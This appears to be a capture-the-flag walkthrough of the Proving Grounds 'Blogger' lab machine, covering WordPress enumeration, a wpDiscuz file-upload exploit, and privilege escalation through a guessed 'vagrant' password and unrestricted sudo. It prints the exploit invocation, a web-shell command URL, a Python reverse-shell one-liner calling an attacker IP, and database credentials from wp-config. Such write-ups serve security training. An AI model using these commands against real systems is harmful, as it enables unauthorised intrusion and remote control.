In this walk through, we will be going through the Blogger room from Proving Grounds. This room is rated as Easy on the platform and it consists of WordPress Plugins Enumeration and exploitation to get initial access and for the privilege escalation, some password guessing and misconfigured sudo permissions exploitation is required to get root on the server. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Blogger |
IPaddress | 192.168.224.217 |
Difficulty | Easy |
OS | Linux |
Description | Blogger is an easy machine which requires WordPress Plugins Enumeration and exploitation to get initial access and then with the help of some password guessing and misconfigured sudo permissions get root on the server. |
Enumeration:
- I started off with a regular nmap scan with service version detection flag enabled and found two ports opened – 22 (SSH) and 80 (HTTP).
$ sudo nmap -sS -sV 192.168.224.217 Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-11 13:36 IST Nmap scan report for 192.168.224.217 Host is up (0.21s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.61 seconds
Enumerating Port 80 (HTTP)
- Enumerated the web server on port 80 and found a static portfolio website running.
- There is a login button in the site’s menu. Registered as a user however it didn’t find any way to log in further.
- Next, fired gobuster on the target to reveal some hidden directories. Found a couple of them. However, the interesting one was the /assets directory.
$ gobuster dir -u http://192.168.224.217/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.224.217/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2024/01/11 13:47:49 Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 319] [--> http://192.168.224.217/images/] /js (Status: 301) [Size: 315] [--> http://192.168.224.217/js/] /css (Status: 301) [Size: 316] [--> http://192.168.224.217/css/] /assets (Status: 301) [Size: 319] [--> http://192.168.224.217/assets/] /server-status (Status: 403) [Size: 280] =============================================================== 2024/01/11 13:54:45 Finished
- Enumerated the content of the directory further and found a “blog” sub-directory in the fonts section.
- The blog directory posts are redirecting to particular domain – blogger.thm. So, added it to my /etc/hosts file and accessed the website. The running Blog website found to be running WordPress CMS.
Enumerating WordPress CMS
- Moving on, used wpscan to enumerate further the WordPress installation. I initially looked for all plugins, all themes and the available users.
$ wpscan --url http://blogger.thm/assets/fonts/blog/ -e ap,at,u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.25 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N] [+] URL: http://blogger.thm/assets/fonts/blog/ [192.168.224.217] [+] Started: Thu Jan 11 14:21:42 2024 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.18 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://blogger.thm/assets/fonts/blog/xmlrpc.php | Found By: Link Tag (Passive Detection) | Confidence: 100% | Confirmed By: Direct Access (Aggressive Detection), 100% confidence | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://blogger.thm/assets/fonts/blog/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://blogger.thm/assets/fonts/blog/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://blogger.thm/assets/fonts/blog/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02). | Found By: Rss Generator (Passive Detection) | - http://blogger.thm/assets/fonts/blog/?feed=rss2, <generator>https://wordpress.org/?v=4.9.8</generator> | - http://blogger.thm/assets/fonts/blog/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.9.8</generator> [+] WordPress theme in use: poseidon | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/ | Last Updated: 2022-10-20T00:00:00.000Z | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/readme.txt | [!] The version is out of date, the latest version is 2.3.9 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css?ver=2.1.1 | Style Name: Poseidon | Style URI: https://themezee.com/themes/poseidon/ | Description: Poseidon is an elegant designed WordPress theme featuring a splendid fullscreen image slideshow. The... | Author: ThemeZee | Author URI: https://themezee.com | | Found By: Css Style In Homepage (Passive Detection) | | Version: 2.1.1 (80% confidence) | Found By: Style (Passive Detection) | - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css?ver=2.1.1, Match: 'Version: 2.1.1' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating All Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:20:51 <==========================================================================================================> (26636 / 26636) 100.00% Time: 00:20:51 [+] Checking Theme Versions (via Passive and Aggressive Methods) [i] Theme(s) Identified: [+] poseidon | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/ | Last Updated: 2022-10-20T00:00:00.000Z | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/readme.txt | [!] The version is out of date, the latest version is 2.3.9 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css | Style Name: Poseidon | Style URI: https://themezee.com/themes/poseidon/ | Description: Poseidon is an elegant designed WordPress theme featuring a splendid fullscreen image slideshow. The... | Author: ThemeZee | Author URI: https://themezee.com | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Known Locations (Aggressive Detection) | - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/, status: 500 | | Version: 2.1.1 (80% confidence) | Found By: Style (Passive Detection) | - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css, Match: 'Version: 2.1.1' [+] twentyfifteen | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/ | Last Updated: 2023-11-07T00:00:00.000Z | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/readme.txt | [!] The version is out of date, the latest version is 3.6 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/style.css | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/, status: 500 | | Version: 2.0 (80% confidence) | Found By: Style (Passive Detection) | - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 2.0' [+] twentyseventeen | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/ | Last Updated: 2023-11-07T00:00:00.000Z | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 3.4 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/style.css | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/, status: 500 | | Version: 1.7 (80% confidence) | Found By: Style (Passive Detection) | - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.7' [+] twentysixteen | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/ | Last Updated: 2023-11-07T00:00:00.000Z | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/readme.txt | [!] The version is out of date, the latest version is 3.1 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/style.css | Style Name: Twenty Sixteen | Style URI: https://wordpress.org/themes/twentysixteen/ | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/, status: 500 | | Version: 1.5 (80% confidence) | Found By: Style (Passive Detection) | - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.5' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:01 <================================================================================================================> (10 / 10) 100.00% Time: 00:00:01 [i] User(s) Identified: [+] j@m3s | Found By: Author Posts - Display Name (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Login Error Messages (Aggressive Detection) [+] jm3s | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Thu Jan 11 14:42:55 2024 [+] Requests Done: 26708 [+] Cached Requests: 14 [+] Data Sent: 7.691 MB [+] Data Received: 4.265 MB [+] Memory used: 323.953 MB [+] Elapsed time: 00:21:12
- I was able to find enough information from the previous scan but was unable to find any known exploits with respect to it, to get the initial access. Also tried to bruteforce the WordPress admin panel with the found usernames and common password wordlist but found no luck. So, re-enumerate the plugins but this time more aggressively.
wpscan --url http://blogger.thm/assets/fonts/blog/ --plugins-detection aggressive -e ap
Initial Access:
- Found two more plugins – wpDiscuz and akismet. Upon checking for any known exploits for both the plugins. Found an Unauthenticated Arbitrary File Upload vulnerability (2020-24186) which is then can be escalated to Remote Code Execution.
- I used the below exploit but it failed to grant me shell. As per the output, the shell was successfully uploaded to the server however the exploit was unable to execute it further.
python3 49967.py -u http://blogger.thm/assets/fonts/blog/ -p /?p=29
- I checked the directory where the shell was stored and then manually added the “?cmd” parameter after it as per the exploit which then gives me output according to the input command.
http://blogger.thm/assets/fonts/blog/wp-content/uploads/2024/01/djnxvscwscmaadr-1705075469.8528.php?cmd=whoami
- Let’s upgrade our shell access by executing the below reverse shell payload using our web shell and catching the response with our netcat listener.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.221",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- Checked the wp-config file and found the mysql username and password. Enumerated further with it but found nothing interesting.
cat wp-config.php
root: sup3r_s3cr3t
- Captured the local.txt flag in user james directory.
Privilege Escalation:
- Next, uploaded and executed Linpeas on the target. It reveals a cron job that is being executed by the root.
- Performed further enumeration on the backup.sh file revealed that we are unable to make changes to the file and the file is creating a backup to james’s home directory. I tried to perform path hijacking attack on tar binary as it was not using the absolute path but it failed.
ls -l /usr/local/bin/backup.sh cat /usr/local/bin/backup.sh
- After a lot of banging of my head, i found out that we can upgrade our shell to user vagrant with his password “vagrant”. Now this was purely a guess-work here and requires no special enumeration.
su vagrant vagrant
- Checked the sudo permissions for the user and found out that it can execute any commands without any password.
sudo -l
- With the equipped permissions, changed user to root and captured the root flag.
sudo su
Also Read: PG – AuthBy
Conclusion:
So that was “Blogger” for you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP). Found out that the web server is running a WordPress installation. Found out that wordpress plugin wpDiscuz is vulnerable to RCE. Used it to get initial access on the target. Next, with some password guessing found out that we can switch our user shell to vagrant with password “vagrant”. Post that, just used ALL sudo privilege to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.